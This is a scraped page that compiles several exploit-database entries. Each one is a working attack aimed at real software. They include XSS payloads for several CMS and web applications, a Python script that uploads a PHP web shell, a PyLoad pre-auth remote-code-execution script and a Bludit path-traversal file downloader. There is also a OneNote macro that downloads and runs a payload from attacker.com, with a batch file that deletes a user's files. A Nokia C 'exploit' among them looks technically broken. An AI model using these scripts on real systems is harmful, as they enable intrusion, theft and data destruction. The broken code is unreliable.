# Exploit Title: Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 2023-06-13 # Exploit Author: tmrswrr # Vendor Homepage: https://textpattern.com/ # Software Link: https://textpattern.com/file_download/118/textpattern-4.8.8.zip # Version: v4.8.8 # Tested : https://release-demo.textpattern.co/ --- Description --- 1) Login admin page , choose Content , Articles section : https://release-demo.textpattern.co/textpattern/index.php?event=article&ID=2 2) Write in Excerpt field this payload > "><script>alert(document.cookie)</script> 3) Click My Site will you see alert button https://release-demo.textpattern.co/index.php?id=2 --- Request --- POST /textpattern/index.php HTTP/2 Host: release-demo.textpattern.co Cookie: txp_login=managing-editor179%2C1673c724813dc43d06d90aff6e69616c; txp_login_public=b7cb169562managing-editor179 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://release-demo.textpattern.co/ X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------26516646042700398511941284351 Content-Length: 4690 Origin: https://release-demo.textpattern.co Dnt: 1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="ID" 2 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="event" article -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="step" edit -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Title" hello -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="textile_body" 1 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Body" hello -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="textile_excerpt" 1 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Excerpt" "><script>alert(document.cookie)</script> -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="sPosted" 1686684925 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="sLastMod" 1686685069 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="AuthorID" managing-editor179 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="LastModID" managing-editor179 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Status" 4 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Section" articles -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="override_form" article_listing -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="year" 2023 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="month" 06 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="day" 13 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="hour" 19 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="minute" 35 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="second" 25 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="exp_year" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="exp_month" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="exp_day" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="exp_hour" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="exp_minute" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="exp_second" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="sExpires" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Category1" hope-for-the-future -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Category2" hope-for-the-future -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="url_title" alert1 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="description" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Keywords" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Image" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="custom_1" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="custom_2" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="save" Save -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="app_mode" async -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="_txp_token" fb6da7f582d0606882462bc4ed72238e -----------------------------26516646042700398511941284351--
HireHackking
# Exploit Title: Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated) # Google Dork: n/a # Date: 14/06/2023 # Exploit Author: Ramil Mustafayev # Vendor Homepage: https://github.com/projectworldsofficial # Software Link: https://github.com/projectworlds32/Art-Gallary-php/archive/master.zip # Version: 1.0 # Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28 # CVE : n/a # Vulnerability Description: # # Online Art Gallery Project 1.0 allows unauthenticated users to perform arbitrary file uploads via the adminHome.php page. Due to the absence of an authentication mechanism and inadequate file validation, attackers can upload malicious files, potentially leading to remote code execution and unauthorized access to the server. # Usage: python exploit.py http://example.com import requests import sys def upload_file(url, filename, file_content): files = { 'sliderpic': (filename, file_content, 'application/octet-stream') } data = { 'img_id': '', 'sliderPicSubmit': '' } url = url+"/Admin/adminHome.php" try: response = requests.post(url, files=files, data=data) except: print("[!] Exploit failed!") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python exploit.py <target_url>") sys.exit(1) target_url = sys.argv[1] file_name = "simple-backdoor.php" file_content = '<?php system($_GET["c"]);?>' upload_file(target_url, file_name, file_content) print("[+] The simple-backdoor has been uploaded.\n Check following URL: "+target_url+"/images/Slider"+file_name+"?c=whoami")
HireHackking
Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS) Google Dork: N/A Date: 18-06-2023 Exploit Author: Harshit Joshi Vendor Homepage: https://community.broadcom.com/home Software Link: https://www.broadcom.com/products/identity/siteminder Version: 12.52 Tested on: Linux, Windows CVE: CVE-2023-23956 Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221 *Description:* I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I have discovered in the Symantec SiteMinder WebAgent. The vulnerability is related to the improper handling of user input and has been assigned the Common Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for this vulnerability is 5.4. Vulnerability Details: --------------------- *Impact:* This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the affected application. *Steps to Reproduce:* *First:* 1) Visit - https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22 2) After visiting the above URL, click on the "*Change Password*" button, and the popup will appear. - The *SMAGENTNAME *parameter is the source of this vulnerability. *- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="* *Second:* 1) Visit - https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22 2) After visiting the above URL, click on the "*Change Password*" button, and the popup will appear. - The *TARGET *parameter is the source of this vulnerability. *- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*
HireHackking
# Exploit Title: Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS) # Date of found: 12/05/2023 # Exploit Author: VIVEK CHOUDHARY @sudovivek # Version: V1.0 # Tested on: Windows 10 # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/student-study-center-management-system-using-php-and-mysql/ # CVE: CVE-2023-33580 # CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33580 Vulnerability Description - The Student Study Center Management System V1.0, developed by PHPGurukul, is susceptible to a critical security vulnerability known as Stored Cross-Site Scripting (XSS). This vulnerability enables attackers to inject malicious JavaScript code, which is then stored and executed by the application. The underlying issue lies in the system's failure to adequately sanitize and validate user-provided input within the "Admin Name" field on the Admin Profile page, thereby allowing attackers to inject arbitrary JavaScript code. Steps to Reproduce - The following steps demonstrate how to exploit the Stored XSS vulnerability in the Student Study Center Management System V1.0: 1. Visit the Student Study Center Management System V1.0 application by accessing the URL: http://localhost/student-study-center-MS-PHP/sscms/index.php. 2. Click on the "Admin" button to navigate to the admin login page. 3. Login to the Admin account using the default credentials. - Username: admin - Password: Test@123 4. Proceed to the Admin Profile page. 5. Within the "Admin Name" field, inject the following XSS payload, enclosed in brackets: {"><script>alert("XSS")</script>}. 6. Click on the "Submit" button. 7. Refresh the page, and the injected payload will be executed. As a result of successful exploitation, the injected JavaScript code will be stored in the application's database. Subsequently, whenever another user accesses the affected page, the injected code will execute, triggering an alert displaying the text "XSS." This allows the attacker to execute arbitrary code within the user's browser, potentially leading to further attacks or unauthorized actions.
HireHackking

Super Socializer 7.13.52 - Reflected XSS

HACKER · %s · %s

# Exploit Title: Super Socializer 7.13.52 - Reflected XSS # Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com # Date: 2023-06-20 # Exploit Author: Amirhossein Bahramizadeh # Category : Webapps # Vendor Homepage: https://wordpress.org/plugins/super-socializer # Version: 7.13.52 (REQUIRED) # Tested on: Windows/Linux # CVE : CVE-2023-2779 import requests # The URL of the vulnerable AJAX endpoint url = "https://example.com/wp-admin/admin-ajax.php" # The vulnerable parameter that is not properly sanitized and escaped vulnerable_param = "<img src=x onerror=alert(document.domain)>" # The payload that exploits the vulnerability payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"} # Send a POST request to the vulnerable endpoint with the payload response = requests.post(url, data=payload) # Check if the payload was executed by searching for the injected script tag if "<img src=x onerror=alert(document.domain)>" in response.text: print("Vulnerability successfully exploited") else: print("Vulnerability not exploitable")
HireHackking
# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE) # Date: 06-10-2023 # Credits: bAu @bauh0lz # Exploit Author: Gabriel Lima (0xGabe) # Vendor Homepage: https://pyload.net/ # Software Link: https://github.com/pyload/pyload # Version: 0.5.0 # Tested on: Ubuntu 20.04.6 # CVE: CVE-2023-0297 import requests, argparse parser = argparse.ArgumentParser() parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.') parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.') arguments = parser.parse_args() def doRequest(url): try: res = requests.get(url + '/flash/addcrypted2') if res.status_code == 200: return True else: return False except requests.exceptions.RequestException as e: print("[!] Maybe the host is offline :", e) exit() def runExploit(url, cmd): endpoint = url + '/flash/addcrypted2' if " " in cmd: validCommand = cmd.replace(" ", "%20") else: validCommand = cmd payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload) print('[+] The exploit has be executeded in target machine. ') def main(targetUrl, Command): print('[+] Check if target host is alive: ' + targetUrl) alive = doRequest(targetUrl) if alive == True: print("[+] Host up, let's exploit! ") runExploit(targetUrl,Command) else: print('[-] Host down! ') if(arguments.url != None and arguments.cmd != None): targetUrl = arguments.url Command = arguments.cmd main(targetUrl, Command)
HireHackking
// Exploit Title: Nokia ASIKA 7.13.52 - Hard-coded private key disclosure // Date: 2023-06-20 // Exploit Author: Amirhossein Bahramizadeh // Category : Hardware // Vendor Homepage: https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2023-25187/ // Version: 7.13.52 (REQUIRED) // Tested on: Windows/Linux // CVE : CVE-2023-25187 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <unistd.h> #include <netinet/in.h> #include <arpa/inet.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/wait.h> #include <signal.h> // The IP address of the vulnerable device char *host = "192.168.1.1"; // The default SSH port number int port = 22; // The username and password for the BTS service user account char *username = "service_user"; char *password = "password123"; // The IP address of the attacker's machine char *attacker_ip = "10.0.0.1"; // The port number to use for the MITM attack int attacker_port = 2222; // The maximum length of a message #define MAX_LEN 1024 // Forward data between two sockets void forward_data(int sock1, int sock2) { char buffer[MAX_LEN]; ssize_t bytes_read; while ((bytes_read = read(sock1, buffer, MAX_LEN)) > 0) { write(sock2, buffer, bytes_read); } } int main() { int sock, pid1, pid2; struct sockaddr_in addr; char *argv[] = {"/usr/bin/ssh", "-l", username, "-p", "2222", "-o", "StrictHostKeyChecking=no", "-o", "UserKnownHostsFile=/dev/null", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-i", "/path/to/private/key", "-N", "-R", "2222:localhost:22", host, NULL}; // Create a new socket sock = socket(AF_INET, SOCK_STREAM, 0); // Set the address to connect to memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port = htons(port); inet_pton(AF_INET, host, &addr.sin_addr); // Connect to the vulnerable device if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) { fprintf(stderr, "Error connecting to %s:%d: %s\n", host, port, strerror(errno)); exit(1); } // Send the SSH handshake write(sock, "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10\r\n", 42); read(sock, NULL, 0); // Send the username write(sock, username, strlen(username)); write(sock, "\r\n", 2); read(sock, NULL, 0); // Send the password write(sock, password, strlen(password)); write(sock, "\r\n", 2); // Wait for the authentication to complete sleep(1); // Start an SSH client on the attacker's machine pid1 = fork(); if (pid1 == 0) { execv("/usr/bin/ssh", argv); exit(0); } // Start an SSH server on the attacker's machine pid2 = fork(); if (pid2 == 0) { execl("/usr/sbin/sshd", "/usr/sbin/sshd", "-p", "2222", "-o", "StrictModes=no", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-o", "AuthorizedKeysFile=/dev/null", "-o", "HostKey=/path/to/private/key", NULL); exit(0); } // Wait for the SSH server to start sleep(1); // Forward data between the client and the server pid1 = fork(); if (pid1 == 0) { forward_data(sock, STDIN_FILENO); exit(0); } pid2 = fork(); if (pid2 == 0) { forward_data(STDOUT_FILENO, sock); exit(0); } // Wait for the child processes to finish waitpid(pid1, NULL, 0); waitpid(pid2, NULL, 0); // Close the socket close(sock); return 0; }
HireHackking
# -*- coding: utf-8 -*- #/usr/bin/env python # Exploit Title: Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated) # Date: 2022-07-21 # Exploit Author: Antonio Cuomo (arkantolo) # Vendor Homepage: https://www.bludit.com # Software Link: https://github.com/bludit/bludit # Version: < 3.13.1 # Tested on: Debian 10 - PHP Version: 7.3.14 import requests import argparse from bs4 import BeautifulSoup #pip3 install beautifulsoup4 def main(): parser = argparse.ArgumentParser(description='Bludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)') parser.add_argument('-x', '--url', type=str, required=True) parser.add_argument('-u', '--user', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) parser.add_argument('-f', '--file', type=str, required=True) args = parser.parse_args() print("\nBludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n") exploit(args) def exploit(args): s2 = requests.Session() url = args.url.rstrip("/") #get csrf token r = s2.get(url+'/admin/') soup = BeautifulSoup(r.text, 'html.parser') formtoken = soup.find('input', {'name':'tokenCSRF'})['value'] #login body= {'tokenCSRF':formtoken,'username':args.user,'password':args.password} r = s2.post(url+'/admin/', data=body, allow_redirects=False) if(r.status_code==301 and r.headers['location'].find('/admin/dashboard') != -1): print("[*] Login OK") else: print("[*] Login Failed") exit(1) #arbitrary download r = s2.get(url+'/plugin-backup-download?file=../../../../../../../../'+args.file) if(r.status_code==200 and len(r.content)>0): print("[*] File:") print(r.text) else: print("[*] Exploit Failed") exit(1) if __name__ == '__main__': main()
HireHackking
## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing ## Author: nu11secur1ty ## Date: 06.22.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app ## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected ## Description: Microsoft OneNote is vulnerable to spoofing attacks. The malicious user can trick the victim into clicking on a very maliciously crafted URL or download some other malicious file and execute it. When this happens the game will be over for the victim and his computer will be compromised. Exploiting the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft OneNote and then click on a specially crafted URL to be compromised by the attacker. STATUS: HIGH Vulnerability [+]Exploit: ```vbs Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass", vbNormalFocus) End Sub ``` [+]Inside-exploit ``` @echo off del /s /q C:%HOMEPATH%\IMPORTANT\* ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html) ## Time spend: 01:15:00 --